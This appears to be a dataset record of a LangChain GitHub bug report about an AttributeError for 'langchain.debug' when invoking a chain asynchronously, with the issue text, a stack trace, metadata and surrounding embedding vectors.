-0.01850932091474533, 0.0018424609443172812, -0.0008250483660958707, 0.003723747795447707, -0.008887579664587975, -0.0070310006849467754, 0.012996056117117405, 0.00145067332778126, 0.008647565729916096, 0.016885695978999138, -0.002426612889394164, -0.00977704394608736, -0.028505200520157814, -0.0009829988703131676, -0.02597799338400364, -0.008111064322292805, -0.024283776059746742, -0.00363903702236712, -0.001525677740573883, -0.02287193015217781, 0.005237954203039408, -0.014683214016258717, 0.013116063550114632, 0.028731096535921097, 0.005117947235703468, -0.024848515167832375, -0.01605270616710186, 0.009904109872877598, 0.03295252099633217, -0.0048779333010315895, -0.006385080516338348, 0.009395845234394073, 0.001890110783278942, -0.007539265789091587, -0.002971939044073224, -0.012861930765211582, -0.01239602081477642, 0.0014744981890544295, 0.017535146325826645, -0.012388961389660835, -0.0209659356623888, 0.027333367615938187, 0.010871225968003273, 0.0024230831768363714, 0.013278425671160221, 0.016151536256074905, -0.005527382716536522, 0.007885168306529522, 0.026740390807390213, -0.003388433950021863, -0.017168065533041954, 0.009734688326716423, -0.025907400995492935, 0.006692157126963139, -0.004584974609315395, 0.02393081597983837, 0.009642918594181538, -0.015177360735833645, -0.006268602795898914, -0.0032331307884305716, -0.004133183509111404, -0.016349194571375847, 0.0020630620419979095, -0.008506380952894688, 0.01881992630660534, 0.00864050630480051, 0.007306310813874006, 0.0037202180828899145, 0.009099356830120087, 0.0002750896674115211, 0.005516794044524431, 0.03154067322611809, -0.004044943023473024, 0.026048585772514343, 0.010108827613294125, -0.002008353127166629, -0.017139827832579613, 0.02441084384918213, 0.015149123966693878, 0.014372607693076134, -0.020824750885367393, 0.017521027475595474, -0.002611917909234762, -0.009035823866724968, -0.0018001055577769876, 0.005075591616332531, -0.025229714810848236, -0.01989293098449707, -0.012671330943703651, -0.004164949990808964, 0.010779455304145813, 0.003889639861881733, -0.01344078779220581, 0.0245943833142519, -0.012523087672889233, -0.014852635562419891, -0.012064237147569656, -0.0018512849928811193, 0.02513088472187519, -0.010701804421842098, -0.014866754412651062, 0.013193714432418346, -0.00036024171276949346, 0.006882756482809782, 0.01141478680074215, -0.0029648798517882824, -0.012847811914980412, -0.025385018438100815, 0.015487967059016228, 0.005177950486540794, -0.013850224204361439, -0.0016333310632035136, 0.005019118078052998, -0.004217894282191992, -0.01831166259944439, 0.0065156761556863785, -0.009593503549695015, 0.008492263033986092, -0.014725569635629654, 0.010751218535006046, -0.006762749515473843, 0.003635507309809327, 0.028646385297179222, 0.019116414710879326, -0.0019483495270833373, -0.006194480694830418, 0.0026754511054605246, -0.003600211115553975, -0.0013941994402557611, -0.01388552039861679, 0.004136713221669197, -0.004690863192081451, 0.0023454315960407257, -0.029197005555033684, -0.011323017068207264, 0.015290308743715286, 0.012050118297338486, 0.01021471619606018, -0.002585445763543248, 0.024806160479784012, 0.012508968822658062, 0.008414611220359802, 0.006469791289418936, -0.008393432945013046, -0.0038084585685282946, 0.012960759922862053, 0.020980054512619972, -0.0005365020479075611, -0.0013694920344278216, 0.00995352491736412, -0.0149938203394413, -0.04139536991715431, 0.008089886046946049, -0.027291012927889824, -0.014711450785398483, -0.01641978695988655, -0.000979469157755375, -0.005774456076323986, -0.006992174778133631, -0.014612621627748013, 0.015318545512855053, -0.003921406343579292, 0.03501381725072861, -0.021488318219780922, -0.014076119288802147, -0.009057002142071724, -0.013426669873297215, 0.02654273249208927, 0.029394665732979774, -0.006956878583878279, 0.021403608843684196, -0.006688627414405346, -0.013497262261807919, -0.014894991181790829, 0.009734688326716423, -0.0031095941085368395, 0.006430965382605791, 0.012600738555192947, 0.003296663984656334, -0.01798693649470806, -0.014104356057941914, -0.011315957643091679, -0.013483143411576748, -0.011697156354784966, -0.019229363650083542, -0.013101944699883461, -0.001080945716239512, 0.007412199396640062, 0.0011303604114800692, 0.01973762735724449, -0.004087298642843962, 0.017210420221090317, 0.03450555354356766, -0.005266190972179174, -0.006798045709729195, -0.010320604778826237, -0.006526264827698469, 0.003120183013379574, -0.004249660763889551, -0.03402552381157875, 0.02004823461174965, 0.015332663431763649, -0.02041531540453434, -0.000014015067790751345, -0.01972351036965847, 0.011097121052443981, -0.015530322678387165, -0.003653155406937003, 0.022617796435952187, -0.015784455463290215, -0.0025377958081662655, -0.005237954203039408, -0.012777219526469707, 0.005657978821545839, 0.006900404579937458, -0.028011053800582886, 0.008873461745679379, -0.005866226274520159, 0.008944054134190083, -0.0038119882810860872, -0.009057002142071724, -0.005700334440916777, 0.015233834274113178, 0.020711801946163177, 0.004916758742183447, 0.008231070823967457, -0.0013421375770121813, 0.02514500357210636, 0.029959402978420258, -0.004281427711248398, 0.006798045709729195, 0.0001518839126219973, 0.012720745988190174, -0.008944054134190083, -0.002615447388961911, -0.0002664862258825451, -0.007560443133115768, -0.02127654105424881, -0.02916876971721649, -0.010087650269269943, -0.008591092191636562, 0.012720745988190174, 0.013807868584990501, 0.003635507309809327, -0.011358313262462616, -0.010264131240546703, -0.005880344659090042, 0.0066568609327077866, -0.008767573162913322, 0.006625094451010227, 0.019582325592637062, -0.005785045213997364, 0.004680274520069361, 0.027996934950351715, -0.001296252477914095, -0.004694392904639244, 0.007969879545271397, -0.019299956038594246, 0.003999058157205582, 0.020203538239002228, -0.0022430727258324623, 0.008421670645475388, -0.007027470972388983, 0.0294793751090765, -0.0023101354017853737, -0.002117771189659834, 0.0022995464969426394, 0.004708511289209127, 0.0020771806593984365, -0.016193890944123268, 0.015643270686268806, 0.0025960346683859825, 0.0076663317158818245, -0.0013730217469856143, 0.020132945850491524, -0.011838341131806374, 0.006385080516338348, 0.009240541607141495, 0.01833989843726158, 0.03789398819208145, -0.006681568454951048, -0.009466437622904778, 0.013137240894138813, 0.01605270616710186, 0.010009998455643654, -0.006709805224090815, 0.0049132294952869415, -0.015911521390080452, -0.009388785809278488, 0.01712571084499359, -0.014923227950930595, 0.001692452235147357, -0.022942522540688515, 0.0062756622210145, -0.006360372994095087, 0.007609858177602291, 0.007306310813874006, -0.025060292333364487, -0.01231131050735712, -0.0003692863683681935, -0.009381726384162903, -0.007454554550349712, -0.0011788926785811782, -0.016843341290950775, -0.015798574313521385, 0.007722805719822645, -0.008358136750757694, -0.015657389536499977, -0.0023366075474768877, -0.006769808940589428, -0.0008369608549401164, 0.0018971700919792056, 0.005721511784940958, -0.008442847989499569, -0.00006005866816849448, 0.02861814945936203, -0.011146536096930504, -0.04094357788562775, 0.006321547087281942, -0.0016933345468714833, -0.005841519217938185, 0.010151183232665062, 0.006349784322082996, 0.0035631500650197268, 0.006222717929631472, 0.018777571618556976, 0.001335960696451366, 0.007080415263772011, -0.013927875086665154, 0.00248838122934103, 0.0005682686460204422, 0.0024654387962073088, -0.0034978522453457117, -0.0010491791181266308, 0.006519205868244171, 0.010193538852036, -0.017535146325826645, -0.015149123966693878, 0.0007659272523596883, -0.00818871520459652, 0.00198717531748116, -0.0021107119973748922, -0.008661684580147266, 0.0017948111053556204, -0.007165126036852598, -0.012014822103083134, -0.005079121328890324, -0.006106240209192038, 0.002839578315615654, -0.017916344106197357, -0.012861930765211582, -0.020556500181555748, -0.003819047473371029, -0.0348726324737072, 0.0038825806695967913, -0.0031713624484837055, 0.011083003133535385, -0.029761744663119316, -0.011111239902675152, 0.04286368936300278, -0.024848515167832375, -0.03859991207718849, -0.014443200081586838, -0.004613211844116449, 0.017224539071321487, 0.0010421199258416891, 0.006512146443128586, 0.020895343273878098, 0.007285133004188538, -0.0007500439533032477, -0.007147477939724922, -0.004454378969967365, -0.018438728526234627, 0.012897226959466934, -0.0078004575334489346, -0.014372607693076134, -0.013779631815850735, -0.0017206891207024455, -0.008591092191636562, -0.0256815068423748, -0.015826810151338577, 0.0081251822412014, 0.015120886266231537, -0.0014674389967694879, -0.006836871616542339, -0.026302719488739967, 0.014160830527544022, 0.004348490387201309, 0.011323017068207264, 0.00159097567666322, 0.014570266008377075, 0.005237954203039408, -0.015389137901365757, 0.002763691358268261, 0.0022536616306751966, 0.021022409200668335, 0.007249836809933186, -0.003464320907369256, 0.012410139665007591, -0.004793222062289715, 0.004560267552733421, 0.01317959651350975, 0.001020059804432094, 0.02563915029168129, 0.00363903702236712, -0.012148947454988956, -0.01589740253984928, -0.033856101334095, 0.014372607693076134, 0.00767339114099741, -0.002971939044073224, 0.013483143411576748, 0.008668744005262852, -0.027982817962765694, 0.0071792444214224815, 0.010652389377355576, -0.03137125074863434, 0.0042037758976221085, -0.015629151836037636, 0.022547204047441483, -0.004323782864958048, 0.010264131240546703, 0.01795870065689087, 0.0012371314223855734, 0.004323782864958048, -0.03546560928225517, 0.01082181092351675, -0.0009291721507906914, -0.019483495503664017, -0.005746219307184219, -0.01585504785180092, -0.0019536439795047045, 0.010631212033331394, 0.010045294649899006, -0.0006922464817762375, 0.0014850870938971639, -0.012685449793934822, 0.01657508872449398, 0.008118122816085815, 0.006879226770251989, -0.009812340140342712, 0.02165774069726467, 0.0060532959178090096, 0.0022483670618385077, 0.022928403690457344, -0.017210420221090317, 0.011654800735414028, -0.009374666959047318, -0.004909699782729149, -0.015544440597295761, 0.005799163598567247, 0.0023101354017853737, -0.0263591930270195, -0.013560795225203037, -0.0008766690734773874, -0.006127418018877506, -0.0020807101391255856, 0.0060003516264259815, 0.012530146166682243, -0.01212071068584919, -0.022603677585721016, -0.0012150713009759784, -0.015120886266231537, -0.00792752392590046, -0.018085766583681107, 0.017732804641127586, -0.015290308743715286, -0.013589031994342804, -0.003547266824170947, 0.0025166182313114405, 0.01160538662225008, 0.0005969467456452549, 0.013094885274767876, 0.001437437254935503, 0.0005753278383053839, -0.006180362310260534, -0.016702156513929367, 0.01972351036965847, -0.03035472147166729, 0.0078004575334489346, 0.018241070210933685, -0.021573029458522797, -0.015205597504973412, -0.006970996968448162, -0.030778275802731514, -0.010744159109890461, 0.0019059941405430436, -0.01500793918967247, 0.0028589912690222263, -0.00846402533352375, 0.022984877228736877, -0.007052178028970957, 0.01990704983472824, 0.028702858835458755, 0.0013483143411576748, 0.009459378197789192, 0.0013597856741398573, 0.014266719110310078, -0.017168065533041954, 0.009628799743950367, -0.009014646522700787, 0.0014965583104640245, 0.005605034530162811, 0.016264483332633972, 0.013553735800087452, -0.0024548498913645744, 0.02633095532655716, 0.014259659685194492, 0.003081357106566429, -0.011541853658854961, 0.003397257998585701, 0.01464085839688778, -0.004870873875916004, -0.01186657790094614, -0.009127593599259853, 0.0134337292984128, -0.006233306601643562, -0.014965583570301533, 0.012678390368819237, -0.008315782062709332, -0.022081295028328896, -0.023479023948311806, -0.029874693602323532, -0.0065156761556863785, 0.02146008238196373, -0.011548912152647972, -0.0004308341012801975, 0.011266542598605156, 0.014252600260078907, -0.01430201530456543, 0.003361961804330349, -0.003393728518858552, -0.002470733132213354, 0.01694216951727867, -0.005516794044524431, 0.01641978695988655, 0.004429671447724104, 0.009078179486095905, -0.014309074729681015, -0.013454906642436981, -0.012261895462870598, 0.011725393123924732, 0.00043370190542191267, -0.029789982363581657, -0.007885168306529522, 0.006861578673124313, -0.0001160362153314054, -0.009515851736068726, -0.016137417405843735, -0.0223213080316782, -0.008096945472061634, 0.013327840715646744, -0.006946289911866188, -0.0072427778504788876, -0.0010482968064025044, 0.004267308861017227, 0.006794515997171402, 0.0041861278004944324, 0.019483495503664017, 0.03072180226445198, -0.012261895462870598, 0.030439432710409164, 0.010172361508011818, 0.013109004124999046, 0.003291369415819645, -0.021728333085775375, 0.0002510441408958286, 0.004740277770906687, -0.013574914075434208, -0.02808164618909359, -0.001116241910494864, -0.009205245412886143, -0.00614153640344739, 0.023817867040634155, 0.01021471619606018, 0.009395845234394073, 0.027121590450406075, -0.008774632588028908, 0.003227836452424526, 0.003473144955933094, 0.018749333918094635, -0.0072074816562235355, 0.009572326205670834, -0.008266367018222809, -0.0037731623742729425, 0.009741747751832008, 0.005816811695694923, 0.004592034034430981, -0.017351604998111725, 0.0042037758976221085, 0.011915992945432663, -0.034787923097610474, -0.000712100591044873, -0.01849520206451416, 0.021064763888716698, 0.03213365003466606, 0.0162503644824028, -0.0017842223169282079, 0.00958644412457943, 0.010320604778826237, -0.018749333918094635, -0.026952167972922325, -0.023111943155527115, 0.014118474908173084, -0.01725277677178383, -0.004687333479523659, -0.00431672390550375, -0.012353665195405483, -0.0034360839053988457, 0.00662862416356802, -0.009064060635864735, -0.0026260362938046455, 0.009155831299722195, 0.013384314253926277, 0.0031184181571006775, 0.025949757546186447, 0.03086298704147339, -0.010334723629057407, -0.0024901460856199265, 0.0029331131372600794, 0.012007762677967548, -0.01186657790094614, -0.00828048586845398, -0.007489850744605064, -0.004073180258274078, 0.031117118895053864, 0.01848108321428299, 0.008576973341405392, 0.01952585019171238, 0.006695686839520931, -0.0023507261648774147, -0.004507323261350393, -0.0026507435832172632, 0.0019006996881216764, -0.006088592112064362, 0.011167713440954685, -0.013836105354130268, -0.002176010049879551, 0.012671330943703651, 0.0017303955974057317, 0.003229601075872779, 0.01509264949709177, 0.022617796435952187, -0.0054709091782569885, 0.01465497724711895, 0.006466261576861143, -0.014245540834963322, 0.0054885572753846645, -0.0017524557188153267, -0.01797281950712204, -0.01221953984349966, 0.025173241272568703, 0.0015971524408087134, 0.010045294649899006, 0.026627443730831146, -0.006914522964507341, -0.004517911933362484, 0.007405139971524477, 0.004373197443783283, 0.0014921462861821055, -0.011224187910556793, 0.009635859169065952, -0.006127418018877506, -0.0019518791232258081, 0.00009954627603292465, 0.004217894282191992, 0.0135184396058321, -0.0036284481175243855, -0.004214364569634199, 0.0016245070146396756, -0.006522735580801964, 0.019314073026180267, 0.01152773480862379, 0.003309017512947321, -0.010278250090777874, 0.011979525908827782, -0.01759161986410618, -0.016857458278536797, 0.005947407800704241, 0.0030213536228984594, -0.018904637545347214, 0.01003117673099041, -0.00015475171676371247, -0.01746455393731594, -0.001094181789085269, -0.004281427711248398, 0.008654625155031681, 0.021177712827920914, -0.01185951940715313, 0.00506500294432044, 0.00331431208178401, 0.003871991764754057, -0.012607797980308533, 0.00544973136857152, 0.009911169297993183, 0.004641448613256216, 0.0041861278004944324, -0.003279015887528658, 0.004479086026549339, 0.003564914921298623, 0.01708335429430008, -0.02336607687175274, -0.0010209422325715423, 0.005619152914732695, -0.01620800979435444, -0.013574914075434208, -0.009275837801396847, 0.001595387700945139, 0.022914284840226173, -0.008689921349287033, 0.004592034034430981, -0.041818924248218536, -0.010045294649899006, -0.006709805224090815, 0.026980405673384666, 0.014725569635629654, -0.006169773638248444, -0.000716512615326792, 0.007751042954623699, -0.029253480955958366, 0.00010495101014385, 0.007369843777269125, 0.009459378197789192, 0.00006811061030020937, 0.029874693602323532, -0.006367432419210672, 0.0028413431718945503, -0.025893284007906914, 0.003146655159071088, 0.024537909775972366, 0.001727748429402709, -0.004870873875916004, 0.018890518695116043, -0.001992469886317849, 0.0024036704562604427, 0.006699216552078724, 0.01125242467969656, 0.0003401669964659959, 0.00802635308355093, 0.025427373126149178, -0.0018759923987090588, 0.0008281368063762784, -0.020485907793045044, -0.010807693004608154, -0.020132945850491524, 0.0027442786376923323, 0.016278602182865143, -0.006783927325159311, -0.01378669124096632, -0.0026825102977454662, 0.032896045595407486, 0.009219364263117313, 0.01412553433328867, 0.014527910389006138, 0.010617093183100224, 0.013158418238162994, 0.003072533058002591, -0.016518615186214447, -0.006949819158762693, -0.00022567500127479434, 0.01622212864458561, -0.005132065620273352, 0.0030319425277411938, -0.024184947833418846, -0.01953996904194355, -0.0014480260433629155, 0.00864050630480051, -0.009332312270998955, 0.005259132012724876, -0.005096769426018, -0.007228659000247717, 0.0064980280585587025, 0.004412023350596428, -0.007885168306529522, -0.006543912924826145, 0.0021283600945025682, 0.0096005629748106, 0.024636738002300262, 0.0006106240325607359, 0.02285781130194664, -0.006875697523355484, 0.01073710061609745, -0.010002939961850643, -0.0019501143833622336, 0.006769808940589428, -0.013313721865415573, -0.003201364306733012, 0.009522911161184311, -0.024537909775972366, -0.018071647733449936, 0.0014030234888195992, 0.0066568609327077866, 0.0026683916803449392, 0.002553679049015045, 0.0071439482271671295, 0.022561322897672653, -0.022194242104887962, 0.00026626561884768307, 0.0054603200405836105, -0.007433377206325531, -0.015840929001569748, 0.002087769564241171, 0.009593503549695015, -0.02251896820962429, -0.006999233737587929, 0.05551384389400482, -0.006706275511533022, 0.025159122422337532, 0.02514500357210636, -0.0035507965367287397, 0.003459026338532567, 0.006392139475792646, -0.0034519671462476254, -0.01274898275732994, 0.026119178161025047, -0.01326430682092905, -0.009981761686503887, 0.0003159008629154414, -0.0021160063333809376, 0.0019430550746619701, 0.004281427711248398, 0.014316133223474026, -0.014767925255000591, 0.010581796988844872, -0.002807811601087451, -0.010652389377355576, 0.02285781130194664, 0.033065468072891235, -0.002131889807060361, -0.00837931502610445, 0.03331959992647171, 0.018057528883218765, -0.007285133004188538, 0.00628625089302659, 0.004196716472506523, 0.019299956038594246, -0.004260249901562929, 0.0048249890096485615, -0.02373315580189228, 0.005972114857286215, 0.005597975105047226, -0.001287428429350257, 0.031004171818494797, -0.004828518256545067, 0.008033412508666515, -0.011711275205016136, 0.008047530427575111, -0.018749333918094635, 0.01133713498711586, 0.00021387283049989492, -0.009494674392044544, 0.001643919968046248, 0.03910817578434944, 0.02076827734708786, 0.007334547583013773, 0.03176656737923622, 0.0077016279101371765, -0.0003002381999976933, -0.014697332866489887, 0.00195893831551075, -0.004708511289209127, -0.004090827889740467, -0.00767339114099741, -0.005012058652937412, -0.012106591835618019, -0.007426317781209946, -0.01641978695988655, 0.002603093860670924, -0.019314073026180267, -0.01623624563217163, -0.0013694920344278216, -0.010052354075014591, 0.005982703994959593, 0.00755338417366147, 0.026048585772514343, 0.005149713717401028, -0.011118299327790737, -0.0275451447814703, -0.0006538618472404778, 0.014838517643511295, -0.014626740477979183, 0.01636331155896187, -0.010009998455643654, -0.0019889401737600565, -0.0010509439744055271, -0.017676331102848053, -0.0065862685441970825, -0.0005576797411777079, 0.0010950642172247171, -0.011577149853110313, -0.003573738969862461, -0.011407727375626564, -0.00976292509585619, 0.008061649277806282, 0.018354017287492752, 0.01272780541330576, -0.025257952511310577, 0.016857458278536797, -0.0030319425277411938, 0.013327840715646744, -0.01935642957687378, -0.016462141647934914, -0.018932875245809555, 0.0036990405060350895, 0.008231070823967457, 0.0059932926669716835, -0.005640330724418163, -0.0010994762415066361, 0.0048955813981592655, 0.004553208127617836, 0.0028889928944408894, 0.009099356830120087, 0.0005709158140234649, -0.01308076735585928, 0.01689981482923031, 0.007398081012070179, -0.014365548267960548, 0.003836695570498705, 0.004856755491346121, 0.013130181469023228, 0.02075415849685669, 0.003713158890604973, -0.002606623340398073, -0.010962995700538158, 0.017224539071321487, -0.002048943657428026, -0.00645214319229126, 0.021544793620705605, 0.012621916830539703, 0.013405491597950459, 0.00007213657954707742, 0.0071545373648405075, 0.017365723848342896, 0.0160809438675642, -0.012918404303491116, 0.005785045213997364, -0.013864342123270035, 0.0016792161623016, 0.004987351130694151, 0.00040193533641286194, 0.02213776856660843, -0.004609682131558657, 0.015671506524086, 0.017549265176057816, 0.013384314253926277, -0.0128407534211874, 0.041818924248218536, -0.02532854489982128, 0.023831985890865326, -0.021417725831270218, 0.02041531540453434, -0.00662862416356802, 0.013546676374971867, 0.0027707507833838463, -0.014379667118191719, 0.0005025294958613813, 0.01298899669200182, 0.009184068068861961, 0.0020983582362532616, 0.004934406839311123, 0.0019465847872197628, -0.00500852894037962, 0.009155831299722195, -0.010122946463525295, 0.0011762453941628337, 0.020104708150029182, 0.0016448022797703743, -0.006988645065575838, 0.01867874152958393, -0.008965231478214264, 0.009275837801396847, 0.004376727156341076, -0.01185951940715313, -0.0029737039003521204, -0.0030831219628453255, -0.028999347239732742, -0.006272132508456707, 0.01589740253984928, -0.006970996968448162, 0.012706627137959003, 0.018424609676003456, 0.02844872698187828, 0.00637449137866497, 0.009657036513090134, 0.007983997464179993, 0.016673918813467026, -0.01654685288667679, 0.012932523153722286, -0.00619801040738821, 0.039870575070381165, -0.005012058652937412, -0.003384904470294714, 0.006596857216209173, 0.014767925255000591, -0.006600386928766966, 0.010172361508011818, -0.008873461745679379, 0.006558031775057316, 0.013716098852455616, -0.0017427492421120405, 0.013687861151993275, 0.004461437929421663, 0.019299956038594246, 0.004376727156341076, 0.020161181688308716, 0.028745215386152267, -0.024213183671236038, -0.013991408981382847, 0.012007762677967548 ]
null
null
null
null
null
null
null
null
null
[ "hwchase17", "langchain" ]
### Checked other resources - [X] I added a very descriptive title to this issue. - [X] I searched the LangChain documentation with the integrated search. - [X] I used the GitHub search to find a similar question and didn't find it. - [X] I am sure that this is a bug in LangChain rather than my code. - [X] The bug is not resolved by updating to the latest stable version of LangChain (or the specific integration package). ### Example Code model = OpenAI(model_name=model_name, verbose=True) chain = ( { "question": get_question, } | prompt | model | StrOutputParser() ) result = await chain.ainvoke(input_text) ### Error Message and Stack Trace (if applicable) test_prompt_results.py:54: _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ ../services/chain.py:146: in dispatch2 result = await chain.ainvoke(input_text) ../../langchain/libs/core/langchain_core/runnables/base.py:2418: in ainvoke callback_manager = get_async_callback_manager_for_config(config) ../../langchain/libs/core/langchain_core/runnables/config.py:421: in get_async_callback_manager_for_config return AsyncCallbackManager.configure( ../../langchain/libs/core/langchain_core/callbacks/manager.py:1807: in configure return _configure( ../../langchain/libs/core/langchain_core/callbacks/manager.py:1971: in _configure debug = _get_debug() ../../langchain/libs/core/langchain_core/callbacks/manager.py:58: in _get_debug return get_debug() _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ def get_debug() -> bool: """Get the value of the `debug` global setting.""" try: import langchain # type: ignore[import] # We're about to run some deprecated code, don't report warnings from it. # The user called the correct (non-deprecated) code path and shouldn't get warnings. with warnings.catch_warnings(): warnings.filterwarnings( "ignore", message="Importing debug from langchain root module is no longer supported", ) # N.B.: This is a workaround for an unfortunate quirk of Python's # module-level `__getattr__()` implementation: # https://github.com/langchain-ai/langchain/pull/11311#issuecomment-1743780004 # # Remove it once `langchain.debug` is no longer supported, and once all users # have migrated to using `set_debug()` here. # # In the meantime, the `debug` setting is considered True if either the old # or the new value are True. This accommodates users who haven't migrated # to using `set_debug()` yet. Those users are getting deprecation warnings # directing them to use `set_debug()` when they import `langhchain.debug`. > old_debug = langchain.debug E AttributeError: module 'langchain' has no attribute 'debug' ../../langchain/libs/core/langchain_core/globals.py:129: AttributeError ### Description Unable to run OPENAI query with chain as describe in the example code. Getting an error: AttributeError: module 'langchain' has no attribute 'debug' ### System Info master from 24/5/2024
AttributeError: module 'langchain' has no attribute 'debug'
https://api.github.com/repos/langchain-ai/langchain/issues/22212/comments
2
2024-05-27T18:17:03
2024-05-31T13:17:30Z
https://github.com/langchain-ai/langchain/issues/22212
2,319,609,018
22,212
false
This is a GitHub Issue repo:langchain owner:hwchase17 Title : AttributeError: module 'langchain' has no attribute 'debug' Issue date: --- start body --- ### Checked other resources - [X] I added a very descriptive title to this issue. - [X] I searched the LangChain documentation with the integrated search. - [X] I used the GitHub search to find a similar question and didn't find it. - [X] I am sure that this is a bug in LangChain rather than my code. - [X] The bug is not resolved by updating to the latest stable version of LangChain (or the specific integration package). ### Example Code model = OpenAI(model_name=model_name, verbose=True) chain = ( { "question": get_question, } | prompt | model | StrOutputParser() ) result = await chain.ainvoke(input_text) ### Error Message and Stack Trace (if applicable) test_prompt_results.py:54: _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ ../services/chain.py:146: in dispatch2 result = await chain.ainvoke(input_text) ../../langchain/libs/core/langchain_core/runnables/base.py:2418: in ainvoke callback_manager = get_async_callback_manager_for_config(config) ../../langchain/libs/core/langchain_core/runnables/config.py:421: in get_async_callback_manager_for_config return AsyncCallbackManager.configure( ../../langchain/libs/core/langchain_core/callbacks/manager.py:1807: in configure return _configure( ../../langchain/libs/core/langchain_core/callbacks/manager.py:1971: in _configure debug = _get_debug() ../../langchain/libs/core/langchain_core/callbacks/manager.py:58: in _get_debug return get_debug() _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ def get_debug() -> bool: """Get the value of the `debug` global setting.""" try: import langchain # type: ignore[import] # We're about to run some deprecated code, don't report warnings from it. # The user called the correct (non-deprecated) code path and shouldn't get warnings. with warnings.catch_warnings(): warnings.filterwarnings( "ignore", message="Importing debug from langchain root module is no longer supported", ) # N.B.: This is a workaround for an unfortunate quirk of Python's # module-level `__getattr__()` implementation: # https://github.com/langchain-ai/langchain/pull/11311#issuecomment-1743780004 # # Remove it once `langchain.debug` is no longer supported, and once all users # have migrated to using `set_debug()` here. # # In the meantime, the `debug` setting is considered True if either the old # or the new value are True. This accommodates users who haven't migrated # to using `set_debug()` yet. Those users are getting deprecation warnings # directing them to use `set_debug()` when they import `langhchain.debug`. > old_debug = langchain.debug E AttributeError: module 'langchain' has no attribute 'debug' ../../langchain/libs/core/langchain_core/globals.py:129: AttributeError ### Description Unable to run OPENAI query with chain as describe in the example code. Getting an error: AttributeError: module 'langchain' has no attribute 'debug' ### System Info master from 24/5/2024 --- end body ---
3,624
[ -0.0309702567756176, 0.004750107880681753, -0.007486703805625439, 0.010924135334789753, 0.019623395055532455, -0.03657694160938263, 0.006407639477401972, 0.0368439257144928, 0.0068674469366669655, 0.043132904917001724, -0.04381520301103592, 0.00435333838686347, -0.010086099617183208, 0.02477027289569378, 0.03598364070057869, 0.025007592514157295, -0.05224006250500679, 0.027781270444393158, 0.010686815716326237, -0.010790643282234669, 0.027988925576210022, 0.0020190738141536713, -0.018777944147586823, 0.01827363856136799, 0.002439945936203003, -0.007794477976858616, -0.0007944657118059695, -0.000021567959265667014, -0.024532953277230263, -0.0066338349133729935, -0.02254539728164673, 0.0038786984514445066, 0.011435856111347675, 0.019059760496020317, 0.04084870219230652, -0.02792959474027157, 0.009663373231887817, 0.013238005340099335, 0.0017697025323286653, 0.03957310691475868, -0.06105056405067444, -0.023776495829224586, -0.030065475031733513, -0.004716734401881695, -0.024933431297540665, -0.016019098460674286, 0.0007360627641901374, 0.03963243588805199, -0.025675054639577866, 0.009070073254406452, 0.009752367623150349, -0.014891828410327435, 0.006288979668170214, -0.049184564501047134, 0.02049851417541504, -0.015900438651442528, 0.02517075091600418, -0.009070073254406452, 0.019178420305252075, 0.0012505650520324707, -0.005161709617823362, 0.02706930972635746, 0.011502603068947792, 0.009396388195455074, 0.01797698810696602, 0.02358367294073105, -0.029205190017819405, 0.03052528202533722, 0.0090255755931139, 0.015188478864729404, 0.010308586992323399, 0.012177481316030025, -0.006177735514938831, 0.030910927802324295, 0.05132044479250908, -0.026831990107893944, -0.01837746612727642, 0.04001808166503906, -0.020483680069446564, -0.013727477751672268, -0.021640615537762642, -0.013623650185763836, -0.006118405610322952, -0.002667995635420084, 0.011294947937130928, 0.014083457179367542, 0.017250197008252144, -0.08395194262266159, -0.024903764948248863, 0.0035004697274416685, 0.009752367623150349, 0.05063815042376518, -0.02536357380449772, -0.02035018801689148, -0.029205190017819405, -0.03147456422448158, -0.025897542014718056, 0.03236451372504234, -0.01485474780201912, -0.016538236290216446, -0.01570761576294899, -0.02064683847129345, 0.014550681225955486, 0.016998043283820152, 0.037229571491479874, -0.017517181113362312, -0.019400907680392265, -0.008098544552922249, 0.022782718762755394, 0.11895664036273956, -0.007190053816884756, -0.03227551653981209, -0.011020546779036522, -0.018288470804691315, 0.00006129993562353775, 0.01284494437277317, -0.00019143194367643446, 0.03927645832300186, -0.036636270582675934, -0.009322225116193295, -0.015826275572180748, -0.015351636335253716, 0.005636349320411682, -0.04414151608943939, -0.004301424603909254, 0.03909846767783165, -0.0006614367594011128, 0.011547100730240345, -0.0016964670503512025, 0.01768033765256405, 0.015092067420482635, -0.012132983654737473, -0.01277078129351139, -0.008528687059879303, 0.01520331110805273, -0.0006878571584820747, -0.003287252504378557, 0.07795961201190948, 0.018807608634233475, -0.010345667600631714, -0.03734823316335678, -0.04820562154054642, -0.010582988150417805, -0.005128336604684591, 0.01446168590337038, 0.010835140012204647, 0.022901378571987152, 0.01622675359249115, -0.00777964573353529, -0.009262895211577415, -0.02462194859981537, -0.01299326866865158, 0.02840423583984375, 0.03491570055484772, 0.029605668038129807, -0.00047371292021125555, 0.006255606189370155, 0.0034541182685643435, -0.016137758269906044, 0.012340638786554337, -0.00947055034339428, -0.02190760150551796, 0.008328448049724102, -0.023791328072547913, 0.02595687285065651, 0.006040534935891628, -0.006730246357619762, -0.003255733521655202, -0.06235582381486893, 0.023420516401529312, 0.006185152102261782, 0.029620500281453133, 0.03191953897476196, -0.007356919348239899, -0.03583531826734543, 0.020854493603110313, -0.004853935446590185, 0.02183343842625618, 0.00898849405348301, -0.016434408724308014, -0.002477027243003249, -0.011754754930734634, 0.008943996392190456, 0.014038960449397564, 0.054524265229701996, -0.010189926251769066, 0.0035282806493341923, 0.020365020260214806, 0.007349503226578236, -0.003129657357931137, 0.0033113553654402494, -0.010011936537921429, -0.004568409640341997, -0.005076422821730375, -0.03604297339916229, 0.004861351568251848, -0.04618840292096138, -0.01479541789740324, 0.0017075914656743407, 0.0009386190795339644, 0.02313869819045067, -0.04618840292096138, -0.01874827779829502, 0.009997104294598103, -0.042836256325244904, 0.0033873720094561577, -0.007052853237837553, 0.03776354342699051, -0.014602595008909702, -0.031355902552604675, -0.008654762990772724, 0.006392806768417358, 0.01585594192147255, -0.031088916584849358, 